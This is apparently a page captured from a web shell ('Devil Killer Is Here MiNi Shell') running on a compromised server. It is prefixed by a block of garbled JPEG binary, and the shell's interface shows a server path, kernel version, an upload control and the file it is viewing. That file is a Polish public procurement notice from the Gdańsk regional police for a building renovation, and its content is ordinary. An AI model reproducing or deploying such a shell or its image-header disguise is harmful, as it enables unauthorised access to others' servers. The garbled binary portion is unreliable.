JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230901/0037749101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> WYKONANIE REMONTU I PIĘTRA BUDYNKU PRZY ULICY PIWNEJ 32-35 W GDAŃSKU – ZAPROJEKTUJ I WYBUDUJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KOMENDA WOJEWÓDZKA POLICJI W GDAŃSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191236094</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Okopowa 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-819</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">47 74 14 945/817 / 946/752</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@gd.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pomorska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE REMONTU I PIĘTRA BUDYNKU PRZY ULICY PIWNEJ 32-35 W GDAŃSKU – ZAPROJEKTUJ I WYBUDUJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ebbb4724-4895-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00377491</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00117552/24/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Dostosowanie pomieszczeń I piętra budynku przy ul. Piwnej 32/35 w Gdańsku z przeznaczeniem na pomieszczenia służbowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/kwp_gdansk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/kwp_gdansk</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje zawarte są w Rozdziale<br/>XVI.INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH ZAMAWIAJĄCY BĘDZIE SIĘ<br/>KOMUNIKOWAŁ Z WYKONAWCAMI ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH<br/>SPORZĄDZANIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dot. RODO znajdują się w Rozdziale II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dot. RODO znajdują się w Rozdziale II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">24/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 569554,56 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie obejmuje wykonanie kompleksowego remontu I piętra budynku przy ulicy Piwnej 32-35 w Gdańsku dz. Nr 438 obr. Nr 89. Zakres prac obejmuje roboty budowlane i instalacyjne. Przewidziano wymianę podłóg, płytek w łazienkach, stolarkę wewnętrzną, parapety wewnętrzne, szpachlowanie i malowanie ścian i sufitów. Zamówienie obejmuje również wymianę instalacji wod-kan, cwu i hydrantową wraz z armaturą, wymianę instalacji elektrycznej wraz z osprzętem. Należy uwzględnić wykonanie instalacji klimatyzacji i wentylacji mechanicznej w wybranych pomieszczeniach. Ponadto przewidziano roboty związane z instalacją teletechniczną głównie w zakresie wymiany istniejącego osprzętu oraz wykonanie nowej siłowni telekomunikacyjnej, wymiana urządzeń teletransmisyjnych i akumulatorów. Zamówienie obejmuje także wykonanie projektu technicznego instalacji elektrycznej kondygnacji I piętra.<br/>Dane budynku: powierzchnia zabudowy – 345,50 m2; powierzchnia użytkowa – 970,35 m2; powierzchnia całkowita – 1474,00 m2; kubatura – 5997,00 m3.<br/><br/><br/><br/><br/><br/><br/><br/>Termin płatności faktury końcowej, liczony od daty dostarczenia do siedziby Zamawiającego, prawidłowo sporządzonej w/w faktury, na podstawie zatwierdzonego przez osobę upoważnioną, reprezentującą Zamawiającego, protokołu końcowego odbioru robót (we wszystkich branżach), tj. 30 dni po bezusterkowym odbiorze końcowym robót.<br/>Określono wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy: określono w: Specyfikacja Techniczna Wykonania i Odbioru Robót oraz program funkcjonalno – użytkowy.<br/><br/>1. Przedmiot i zakres opracowania<br/>Przedmiotem opracowania jest remont I piętra budynku położonego przy ul. Piwnej 32 - 35 – były obiekt Komisariatu Policji, umożliwiający wznowienie funkcji służbowej w ograniczonym zakresie wraz z opracowaniem projektu technicznego dla instalacji elektrycznej. <br/><br/>2. Stan istniejący<br/><br/>3. 1. Nazwa i adres jednostki<br/>Budynek służbowy Policji, ul. Piwna 32 - 35 (działka nr ew. 438 obręb 89).<br/><br/>3.3. Parametry charakteryzujące całą nieruchomość<br/>powierzchnia zabudowy - 345,5 m2<br/>powierzchnia użytkowa - 970,35 m2 + podpiwniczenie 100% <br/>kubatura - 5 997,00 m3<br/>ilość kondygnacji - 4 i 5 nadziemnych + piwnice <br/>I piętro budynku o powierzchni - 300,27 m2<br/>Obiekt objęty jest ochroną Wojewódzkiego Konserwatora Zabytków w Gdańsku.<br/><br/>3.4. Opis istniejącej zabudowy.<br/>	Budynek Policji odrestaurowany w latach 50-tych XX wieku usytuowany jest w zwartej zabudowie miejskiej i zajmuje 4 przylegające do siebie kamieniczki o 4 i 5 kondygnacjach nadziemnych, całkowicie podpiwniczone, w układzie konstrukcyjnym poprzecznym (nr 32 i 33) oraz mieszanym (nr 34 i 35). Ściany zewnętrzne z cegły ceramicznej pełnej na zaprawie cementowo - wapiennej, ściany wewnętrzne konstrukcyjne z cegły ceramicznej gr 8 cm. W murach konstrukcyjnych we wszystkich poziomach wieńce żelbetowe, ścianki działowe z Ytongu gr. 6 cm, schody żelbetowe. Stropy-w budynku nr 32 typu DMS, w budynku nr 33 Kleina, nr 34 i 35 żelbetowe. Więźba dachowa o konstrukcji drewnianej jętkowej, pokrycie dachu – dachówka ceramiczna. Stolarka okienna i drzwiowa drewniana. Posadzki – cementowe, PCV, gres. Kraty żelazne kute, stałe, ozdobne w oknach parteru i I piętra. Rynny, rury spustowe, opierzenia i obróbki - z blachy cynkowej, częściowo miedziowanej. Kosze zlewowe pokryte blachą cynkową. <br/><br/>Instalacje występujące w budynku:<br/> - wodociągowa<br/> - kanalizacji sanitarnej<br/> - centralnego ogrzewania <br/> - gazowa - nieczynna<br/> - hydrantowa<br/> - wentylacji mechanicznej<br/> - elektryczne, oświetleniowa<br/> - odgromowa<br/> - teletechniczna.<br/><br/>3.5. Ocena stanu technicznego<br/>Budowlana<br/>Ogólny stan techniczny obiektu jest dostateczny, niektóre elementy wykończenia budynku są wyeksploatowane lub uszkodzone. Renowacji wymaga stolarka okienna i drzwiowa (liczne wypaczenia i ubytki). Występują ślady licznych zalań stropów i ścian pomieszczeń, odpadanie farby i tynków, spękania ścian. Lastrykowe wykończenie schodów i wykładzin podłogowych z lastryka i tworzyw sztucznych są w złym stanie technicznym (pęknięcia i ubytki). <br/><br/><br/>Instalacyjna<br/>Stan sanitariatów jest niedostateczny – należy wymienić piony i podejścia rur: wody zimnej, ciepłej i kanalizacji sanitarnej na nowe wraz z białym montażem i armaturą. Ciepła woda przygotowywana jest w podgrzewaczach pojemnościowych elektrycznych, zlokalizowanych w piwnicy i na parterze. Instalacja gazowa jest unieczynniona. Instalacja centralnego ogrzewania zasilana jest z miejskiej sieci ciepłowniczej, istniejące grzejniki – stalowe żebrowane. Brak zaworów termostatycznych i odpowietrzających.<br/><br/>Na poziomie I piętra znajdują się cztery łazienki.<br/><br/>Instalacja elektryczna nie spełnia aktualnych wymogów norm i przepisów. Wykonana jest jeszcze w układzie sieci TN-C. Część przewodów jest aluminiowa. Przeciwpożarowy wyłącznik prądu nie spełnia aktualnych przepisów. Istniejąca lampy nie zapewniają odpowiedniego natężenia oświetlenia. Brak jest oświetlenia awaryjnego.<br/><br/>Instalacja teletechniczna wymaga dostosowania do nowej funkcji pomieszczeń. <br/><br/>4.0 Opis ogólny zamierzenia<br/><br/>4.1.Charakterystyka zadania<br/>Zamierzenie polega na remoncie kondygnacji I piętra umożliwiający wznowienie funkcji służbowej w ograniczonym zakresie wraz z opracowaniem projektu technicznego dla instalacji elektrycznej. <br/><br/>Realizacja zadania wymagać będzie wykonania niezbędnych robót modernizacyjnych.<br/><br/>Opis potrzeb dla poszczególnych pomieszczeń zamieszczono w Programie Funkcjonalno – Użytkowym stanowiącym zał. nr 10 do SWZ.<br/><br/><br/><br/><br/>4.3. Zakres robót <br/><br/>4.3.1. Roboty budowlane.<br/>	wymiana wykładzin podłogowych z naprawą podłoża <br/>	renowacja stolarki okiennej zewnętrznej<br/>	wymiana stolarki drzwiowej wewnętrznej<br/>	szpachlowanie ścian i sufitów <br/>	malowanie pomieszczeń<br/>	wykonanie okładzin ściennych i podłogowych z płytek oraz wykładzin<br/>	malowanie grzejników farbą olejną,<br/>	wykonanie ścianki p.poż. z drzwiami EI60 pomiędzy I piętrem a II piętrem<br/>	wykonanie nowych ścianek działowych gipsowo- kartonowych<br/>	rozbiórka ścianki działowej<br/><br/>4.3. 2. Roboty sanitarne<br/>	wymiana pionów instalacji wod-kan z podejściami do przyborów sanitarnych na poziomie I p. z podłączeniem do istn instalacji przy przejściu na II p. oraz wymiana pojedynczych pionów wod- kan od poziomu piwnicy do II p. <br/>	biały montaż i armatura dla łazienek na kondygnacji I piętra,<br/>	montaż zaworów termostatycznych na grzejnikach istniejących,<br/>	montaż grzejników elektrycznych dla wybranych pomieszczeń;<br/>	wykonanie wentylacji mechanicznej dla wybranych pomieszczeń (wentylator kanałowy),<br/>	wykonanie instalacji klimatyzacyjnej dla wybranych pomieszczeń.<br/><br/>4.3.3.Roboty elektryczne<br/>	Wymiana rozdzielnicy piętrowej<br/>	Wymiana oprzewodowania na remontowanej części<br/>	Wymiana oświetlenia ogólnego<br/>	Montaż oświetlenia awaryjnego<br/>	Wymiana osprzętu elektroinstalacyjnego z dostosowaniem do nowych potrzeb.<br/>Wytyczne do wykonanie projektu branży elektrycznej zgodnie z załączonymi wytycznymi.<br/><br/>4.3.4.Roboty teletechniczne<br/>Instalacja teletechniczna wymaga dostosowania do nowej funkcji pomieszczeń. <br/><br/>Wymagania branżowe: <br/> - branża teletechniczna<br/> a) bezpośredni wykonawcy montażu instalacji i systemów teleinformatycznych, alarmowych i dozoru obiektu muszą wykazać się wpisem na listę kwalifikowanych pracowników zabezpieczenia technicznego <br/>b) wykonawca jest zobowiązany ująć w swojej ofercie wszystkie koszty związane z realizacją czynności obejmujących wykonywanie konserwacji, serwisowania, przeglądów technicznych, okresowych i eksploatacyjnych urządzeń, aparatów i maszyn zamontowanych/zainstalowanych w ramach realizacji przedmiotu zamówienia objętego niniejszym postępowaniem przez cały okres udzielonej gwarancji przez Wykonawcę<br/>c) dokumentacja powykonawcza i dokumenty odbiorowe winny zostać przekazane Zamawiającemu w wersji papierowej w 3 egzemplarzach oraz w wersji elektronicznej (skany w wersji papierowej) na dzień zgłoszenia gotowości do odbioru.<br/>d) osoby wykonujące poszczególne roboty, prace winne posiadać wszelkie stosowne, wymagane obowiązującymi regulacjami prawnymi, tj. m.in. normami, przepisami itd. uprawnienia kwalifikacyjne branżowe, licencyjne i systemowe<br/><br/>- branża elektryczna, sanitarna, ogólnobudowlana <br/>a)	wykonawca jest zobowiązany ująć w swojej ofercie wszystkie koszty związane z realizacją czynności obejmujących wykonywanie konserwacji, serwisowania, przeglądów technicznych, okresowych i eksploatacyjnych urządzeń, aparatów i maszyn zamontowanych/zainstalowanych w ramach realizacji przedmiotu zamówienia objętego niniejszym postępowaniem przez cały okres udzielonej gwarancji przez Wykonawcę <br/>b)	dokumentacja powykonawcza i dokumenty odbiorowe winny zostać przekazane Zamawiającemu w wersji papierowej w 2 egzemplarzach oraz w wersji elektronicznej (skany w wersji papierowej – 1 egz. oraz w wersji edytowalnej (*DWG programu ACAD wers. 2012)) na dzień zgłoszenia gotowości do odbioru. <br/>c)	osoby wykonujące poszczególne roboty, prace winne posiadać wszelkie stosowne, wymagane obowiązującymi regulacjami prawnymi, tj. m.in. normami, przepisami itd. uprawnienia kwalifikacyjne branżowe: § 15 ust.1,2 umowy <br/><br/>Roboty budowlane będą prowadzone w nieczynnym obiekcie .<br/>Rozliczenie za wykonanie przedmiotu zamówienia jest wynagrodzeniem ryczałtowym.<br/><br/>Wykonawca zobowiązuje się do ubezpieczenia budowy i realizowanych robót przy wykonaniu Przedmiotu Umowy z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej na cały okres trwania robót. Ubezpieczenie od szkód (ryzyk) winno stanowić na sumę ubezpieczenia nie niższą niż cena ofertowa brutto. Kserokopię polisy ubezpieczeniowej Wykonawca przekaże Zamawiającemu przed podpisaniem umowy. Ubezpieczenie winno obejmować również odpowiedzialność cywilną za szkody wyrządzone przez podwykonawców. Szczegółowe warunki opisuje § 17 umowy tj. załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według ilości uzyskanych punktów - od największej do najmniejszej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/>wykluczeniu na zasadach określonych w Rozdziale XI SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/><br/><br/>1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki <br/>dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>4)	zdolności technicznej lub zawodowej: <br/>a)	Zamawiający uzna, że Wykonawca posiada zdolność techniczną lub zawodową, jeżeli <br/>Wykonawca wykaże się przynajmniej jedną realizacją związaną z remontem budynku użyteczności publicznej o wartości minimum 500.000,00 zł brutto lub dwiema realizacjami o wartości minimum 250.000,00 zł brutto każda- wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Na potwierdzenie należy złożyć wykaz robót budowlanych zgodnie załącznikiem nr 9 do SWZ. <br/><br/>UWAGA!<br/>W przypadku, gdy ww. zakres zadania budowlanego będzie stanowił część robót o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić rodzajowo i kwotowo zadanie budowlane, o którym mowa powyżej.<br/><br/>b) Zamawiający uzna, że Wykonawca posiada zdolność techniczną lub zawodową, jeżeli wykaże, że dysponuje lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, z minimum dwuletnim doświadczeniem, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:<br/><br/>Wykonawca musi zaprezentować zespół kadry technicznej, który będzie uczestniczył w wykonaniu zamówienia, z uprawnieniami do wykonywania robót budowlanych, sanitarnych, elektrycznych, teletechnicznych, będących członkami właściwej Izby Samorządu Zawodowego z minimum dwuletnim doświadczeniem zawodowym:<br/>1 osoba posiadająca uprawnienia budowlane bez ograniczeń do sprawowania samodzielnej funkcji technicznej w budownictwie o specjalności budowlano – konstrukcyjnej w zakresie wykonawstwa do pełnienia funkcji kierownika budowy; <br/><br/>1 osoba posiadająca uprawnienia budowlane bez ograniczeń do sprawowania samodzielnej funkcji technicznej w budownictwie o specjalności instalacyjnej z zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; <br/><br/>1 osoba posiadająca uprawnienia budowlane bez ograniczeń do sprawowania samodzielnej funkcji technicznej w budownictwie w zakresie kierowania robotami o specjalności instalacje i urządzenia elektryczne i elektroenergetyczne;<br/><br/>1 osoba posiadająca uprawnienia budowlane bez ograniczeń do sprawowania samodzielnej funkcji technicznej w budownictwie 